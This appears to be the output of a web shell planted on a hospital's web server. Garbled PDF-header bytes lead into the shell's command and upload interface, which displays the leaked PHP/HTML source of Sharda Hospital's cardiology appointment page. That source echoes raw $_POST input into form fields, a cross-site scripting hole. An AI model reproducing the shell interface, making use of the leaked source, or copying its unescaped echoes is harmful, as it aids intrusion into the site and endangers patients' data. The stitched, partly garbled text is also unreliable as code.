%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/lp/cardiology/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/lp/cardiology/index.php
<?php 
	error_reporting(0);
include('../lms/common.php');
include("../lms/include/header.php");
 
 ?>
<script type="text/javascript">

$('.newsletter-signup input').first().keyup(function () {
    var $email = this.value;
    validateEmail($email);
});

function checkMailStatus(){

var email=$("#email").val();// value in field email

 var emailReg = /^([\w-\.]+@([\w-]+\.)+[\w-]{2,4})?$/;
    if (!emailReg.test(email)) {
        alert('Invalid Email id.');
    }


$.ajax({
    type:'post',
        url:'../lms/checkMail.php',// put your real file name 
        data:{email: email},
        success:function(msg){
		$( '#email_status' ).html(msg); 
        }
 });
}

</script>
			<style>
			p
			{
				margin-left: 5px;
			}
	
			input
			{
				width: 60px;
				padding: 5px;
				margin-left: 20px;
				margin-bottom: 20px;
			}
			</style>
<body data-spy="scroll" data-target="#navbar" data-offset="100">
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NFLLKCR"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

    <!--Preloader div-->
    <div class="preloader"></div>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
        <div class="container">
            <div class="navbar-header mobile-center">
                <a class="navbar-brand" href="index.php"><img src="images/health-logo.png" alt="sharda hospital"> </a>

            </div>

            <div class="click-to-call hidden-xs">
                <a href="tel:0120-2333999" target="_blank">
                    <span class="phone-icon"><i class="fa fa-phone"></i></span> <span>0120-2333999</span>
                </a>
            </div>

        </div>
    </nav>
    <!-- // End Fixed navbar -->
    <header id="top" class="header header_menu_padding medical_bg">
        <div class="container">
            <div class="header-content">
                <div class="row">
                    <div class="col-md-6">
                        <div class="hero-area">
                            <h1 class="headline">The Institute <span class="text-highlight">of </span>Cardiology</h1>
<!--                            <h3 class="headline-support">Landing Page Template</h3>-->
                            <!-- Telephone : only visible on Mobile devices
                                              To Change Mobile on Desktop, Its above -->
                            <div class="click-to-call visible-xs">
                                <a href="tel:0120-2333999" target="_blank">
                                    <span class="phone-icon"><i class="fa fa-phone"></i></span> <span>0120-2333999</span>
                                </a>
                            </div>
                            <p class="vertical-space">The Institute of Cardiology at Sharda Hospital provides quality patient care and professional treatment with the help of competent cardiologists & compassionate staff.</p>
                        </div>
                        <div class="benefits benefits-vertical">
                            <div class="benefit-item">
                                <div class="benefit-icon"><i class="fa fa-stethoscope"> </i></div>
                                <h6 class="benefit-title">Well Equipped Cath Lab</h6>
                                <p>The first and the only state-of-the-art Cath Lab in Greater Noida equipped with latest technology</p>
                            </div>

                            <div class="benefit-item">
                                <div class="benefit-icon"><i class="fa fa-heartbeat"> </i></div>
                                <h6 class="benefit-title">Accomplished Cardiologists</h6>
                                <p>Experienced team of cardiologists who have successfully performed 6,000+ complicated and rare surgeries</p>
                            </div>

                            <div class="benefit-item">
                                <div class="benefit-icon"> <i class="fa fa-file-text-o"> </i></div>
                                <h6 class="benefit-title">Dedicated Cardiac Team</h6>
                                <p>Empathetic professionals ensuring round the clock cardiac care and treatment par excellence</p>
                            </div>
                        </div>
                    </div>
                    <!-- // end .col -->

                    <div class="col-md-6 position-static-md">
					
				
                    <div class="appointment-form top-space-sm col-xs-12">

                        <div class="form-header" id="appointment">
                            <h4>MAKE AN APPOINTMENT</h4>
                            <a href="tel:8003456789">Call: 0120-2333999</a>

                            <div class="or_icon">OR</div>
                        </div>
                        
						<?php 
						if($error_message) { echo $error_message; }
						if($success_message){ echo $success_message; }
						if($error_email_exist) { echo $error_email_exist; }?>
						                       
                           <form id="contact_form" method="POST" name="contact_form">

                            <div class="form-group">
                                <label>Full Name <font color="#990000">*</font></label>
                               <input type="text" class="form-control" name="full_name"  id="full_name" value="<?php echo $_POST['full_name'];?>" title="Your full name please">
                            </div>
                            <div class="form-group">
                                <label>Email ID <font color="#990000">*</font></label>
                               <input type="email" class="form-control  newsletter-signup input" name="email" id="email" value="<?php echo $_POST['email'];?>" onBlur="checkMailStatus()" title="We need your email address">
                                <span id='email_status' style="font-size:12px;"> </span>
                            </div>
                            
                            
                            
                            
                            <div class="form-group">
                                <label>Phone Number <font color="#990000">*</font></label>
                               <input type="text" class="form-control" name="phone" id="phone" value="<?php echo $_POST['phone'];?>" maxlength='10' title="Please enter your phone number">
                               <span id='errmsg' style="color:#900; font-size:12px;"> </span>
                            </div>
                            
                         
						
                            
                            <div class="form-group">
                                <label>Date and Time </label>
                          
                                <input type="text" class="form-control"  data-field="datetime" name="date_time" id="date_time"  style="height:38px;" >
                        
 <div id="dtBox" style="float:right;"></div><?php if($error_date_time){ echo $error_date_time;} ?>
                             
                            </div>



                            <div class="form-group">
                                <label>Additional information</label> <small class="text-muted">(optional)</small>
                                <textarea class="form-control" name="message1" id="message1" required rows="3" placeholder="Enter your message here"><?php if($_POST['message1'])  echo trim($_POST['message1']);?>  </textarea>
                            </div>
                            
                            
                               
                            

                            <div class="form-group" style="display:none;">
                                <label>Department <font color="#990000">*</font></label>
                                <input type="text" class="form-control" name="department" readonly  value="Cardiology">                                
                            </div>
                            
                            
                            <div class="text-center top-space">
                                <input type="submit" class="btn btn-success btn-block btn-xl" name="submits"  id="submits" value="Book an Appointment" />
                                <small class="text-muted" style="font-size:14px;">Award-winning hospital with advanced methods of treatment.</small>
                                <div id="js-contact-result" data-success-msg="Form submitted successfully." data-error-msg="Oops. Something went wrong."></div>
                            </div> 

                        </form>
                    </div>
                
                
                    </div>
                    <!-- // end .col -->
                </div>
                <!-- // end .row -->
            </div>
            <!-- // end .header-content -->
        </div>
        <!-- end .container -->
    </header>
 
    <section class="appointment">
        <div class="container">
            <div class="row">
                <div class="col-sm-6">
					<div class="section-title left-aligned"> 
					  <img src="images/medical_big.jpg" class="img-responsive" alt="Appintment Image">
				 
					</div>
				</div>
				<div class="col-sm-6">
				       <div class="section-title left-aligned">                          
                        <h2>Quality Treatment <span class="text-highlight">with</span> Empathy &AMP; Care</h2>
<!--                        <h3 class="subline">You'll love the template features</h3>-->
                        <hr>
                    </div>

                    <p>Sharda Hospital imbibes faith  in providing the highest quality of diagnostic and therapeutic patient care through 24*7 available services.</p>

                    <ul class="list-unstyled checklist" style="font-size:14px;">   
                        <li><p> <i class="fa fa-check"></i>Cardiac Catheterization lab</p></li>
                        <li><p> <i class="fa fa-check"></i>Inpatient and Outpatient services</p></li>
                        <li><p> <i class="fa fa-check"></i>Cardiology OPD Services</p></li>                        
                        <li><p> <i class="fa fa-check"></i>Fully-equipped CCU</p></li>                        
                        <li><p> <i class="fa fa-check"></i>24-Hour Cardiac Emergency Support</p></li>
                        <li><p> <i class="fa fa-check"></i>Fully Equipped Modern CTVS OT</p></li>
                        <li><p> <i class="fa fa-check"></i>24*7 Advanced Cardiac Life Support</p></li>
                        <li><p> <i class="fa fa-check"></i>Cardiac Device Implantation</p></li>
                        
                        
                        
                    </ul>
                    

                </div>
                <!-- // end .col -->

               
                <!-- // end .col -->
            </div>
            <!-- // end .row -->
        </div>
        <!-- end .container -->
    </section>
    <!-- end section.appointment -->

    <!-- 
     OUR SERVICES
     ====================================== -->
    <section class="highlight top-space-s">

        <div class="container">

            <div class="section-title text-center"> 
                <h2>Healing <span class="text-highlight">Procedures</span></h2>
<!--                <h3 class="subline">We are the pioneers in cardiology. Our team ensures complete assistance during the treatment, recovery and post-treatment phase.</h3>-->
                <hr>
            </div>
            <!--start-->
            <div id="mixedSlider">
                <div class="MS-content">
                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/Interventional-Cardiology.jpg" alt="Atholl Palace Hotel">                
                        </div>
                        <h2 class="blogTitle">Interventional Cardiology</h2>
                        <p>Excellence in performing life-saving procedures like cardiac catheterization, angioplasty, balloon valvuloplasty, etc.</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/open-Heart-Surgery.jpg" alt="The Four Seasons Hotel">                
                        </div>
                        <h2 class="blogTitle">Open Heart Surgery</h2>
                        <p>Experience and skill in performing cardiovascular surgeries using the most advanced equipment</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/structural-Heart-Diseases.jpg" alt="The Gleneagles Hotel">                
                        </div>
                        <h2 class="blogTitle">Structural Heart Diseases</h2>
                        <p>Advanced treatment for abnormalities of the valves and vessels of the heart and congenital cardiac defects</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/device-Implantation.jpg" alt="The Four Seasons Hotel">                
                        </div>
                        <h2 class="blogTitle">Device Implantation</h2>
                        <p>Special care during implantation of a medical device like pacemakers, Implantable Cardioverter-defibrillator, CRT, etc.</p>
                    </div>

                    <div class="item">
                        <div class="imgTitle">                            
                            <img src="images/electrophysiology-(EP)-Procedure.jpg" alt="The Four Seasons Hotel">                
                        </div>
                        <h2 class="blogTitle">Electrophysiology (EP) Procedure</h2>
                        <p>Accurate assessment of heart's electrical system for precise diagnosis of abnormal heartbeats (arrhythmia)</p>
                    </div>

                </div>
                <div class="MS-controls">
                    <button class="MS-left"><i class="fa fa-angle-left" aria-hidden="true"></i></button>
                    <button class="MS-right"><i class="fa fa-angle-right" aria-hidden="true"></i></button>
                </div>
            </div>
            <!--End-->
        </div>
        <!-- // end .container -->

    </section>
    <!-- end section.services -->

    <!-- 
     Watch a Video
     ====================================== -->

<!--    <section class="watch_video">
        <div class="container">
            <div class="section-title text-center">
                <h2>WATCH <span class="text-highlight">THIS</span> VIDEO</h2>
                <h3 class="subline">When they talk about their healing journey, it fills our heart with contentment.</h3>
                <hr>
            </div>
            <div class="row">
                <div class="col-md-8 col-md-offset-2">
                    <div class="embed-responsive embed-responsive-16by9">
                        <iframe src="https://player.vimeo.com/video/95558527?color=ff485e&amp;title=0&amp;byline=0&amp;portrait=0&amp;wmode=opaque" allowfullscreen=""></iframe>
                    </div>
                </div>
            </div>
        </div>
    </section>-->
    <!-- end section.watch_video -->

    <!-- 
     Testimonials
     ====================================== -->
    <section class="highlight testimonials top-space-s">
        <div class="container">

            <div class="section-title text-center">                
                <h2>OUR <span class="text-highlight">PATIENT </span> TESTIMONIALS</h2>
                <h3 class="subline">Don't take our word. See what our patients said about us.</h3>
                <hr>
            </div>

            <div class="row">
                <div class="col-sm-2">
                    <img src="images/patient-pic2.jpg" class="img-responsive img-circle center-block" alt="patient">
                </div>
                <div class="col-sm-9">
                    <blockquote class="bq-right">After a major heart attack, I got a pacemaker implantation and was able to drive after one week!</blockquote>
                    <p class="bq-author"><strong><span class="text-highlight">Mrs. Hina Kukreja</span></strong></p>
                </div>
            </div>
            <!-- // end .row -->
            <div class="vertical-space-lg">
                <hr>
            </div>
            <div class="row">
                <div class="col-sm-2 col-sm-push-9">
                    <img src="images/patient-pic.jpg" class="img-responsive img-circle center-block" alt="patient">
                </div>

                <div class="col-sm-9 col-sm-pull-2">
                    <blockquote class="bq-left">I was diagnosed with CAD and shortly after an angioplasty, I could return to work in 5 days.</blockquote>
                    <p class="text-right bq-author"><strong> <span class="text-highlight">Mr. Hemakant Juneja</span></strong></p>
                </div>
            </div>
            <!-- // end .row -->
            <div class="vertical-space-lg">

            </div>

        </div>
        <!-- end .container -->
    </section>
 
    <section class="call-to-action">
        <div class="container">
            <div class="section-title text-center">
                <h2><span class="text-highlight">FREE</span> CONSULTATION FIRST TIME</h2>
                <h3 class="subline">Award-winning hospital with advanced methods of treatment.</h3>
                <hr>

            </div>

            <div class="cta-button text-center vertical-space bottom-space-xl"> <a class="btn btn-success btn-xl" href="#appointment">MAKE AN APPOINTMENT</a>
                <h6 class="vertical-space">or Call : <a href="tel:01202333999">0120-2333999</a></h6>
            </div>

        </div>
    </section>

       <?php include("../lms/include/highlights.php");?>


    <div class="google-map">
        <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3507.169408441502!2d77.48051051461232!3d28.474444382480506!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390cea9cae68659b%3A0xc95b3bd7cf26316e!2sSharda+Hospital!5e0!3m2!1sen!2sin!4v1498126204776" width="100%" height="434" frameborder="0" style="border:0" allowfullscreen></iframe>
    </div>
    <!-- end Google Map -->

    <footer>
        <div class="container">	
            <div class="row">
                <div class="col-sm-5 text-left footNav01">
                    <small>&COPY; 2018. All Sharda Hospital. All Rights Reserved</small>
                </div>
                <div class="col-sm-3">
                    <div class="social-icons footNav02">
                        <a href="https://twitter.com/shardahospital" target="_blank"> <i class="fa fa-twitter"></i> </a>
                        <a href="https://www.facebook.com/ShardaHospital/" target="_blank"> <i class="fa fa-facebook"></i> </a>
                        <a href="https://plus.google.com/+shardahospitalorg" target="_blank"> <i class="fa fa-google-plus"></i> </a>
                    </div>
                </div>
                <div class="col-sm-4 footNav03">
                    <ul class="navbar-nav footer-nav">
                        <li class="nav-item"><a href="disclaimer.php">Disclaimer</a></li>
                        <li class="nav-item"><a href="privacy-policy.php">Privacy Policy</a></li>
                        <li class="nav-item"><a href="terms-of-use.php">Terms of Use</a></li>
                    </ul>
                </div>
            </div>            
        </div>        
    </footer>
	<a class="btn btn-success btn-xl app-button" href="#appointment" >Book an Appointment</a>
    <a href="#top" class="back_to_top"><img src="images/back_to_top.png" alt="back to top"></a>

    <!-- 
     Javascripts : Nerd Stuff :)
     ====================================== -->
    <!-- jQuery Library -->
<?php include("../lms/include/footer.php");?>
</body>

</html>

Kontol Shell Bypass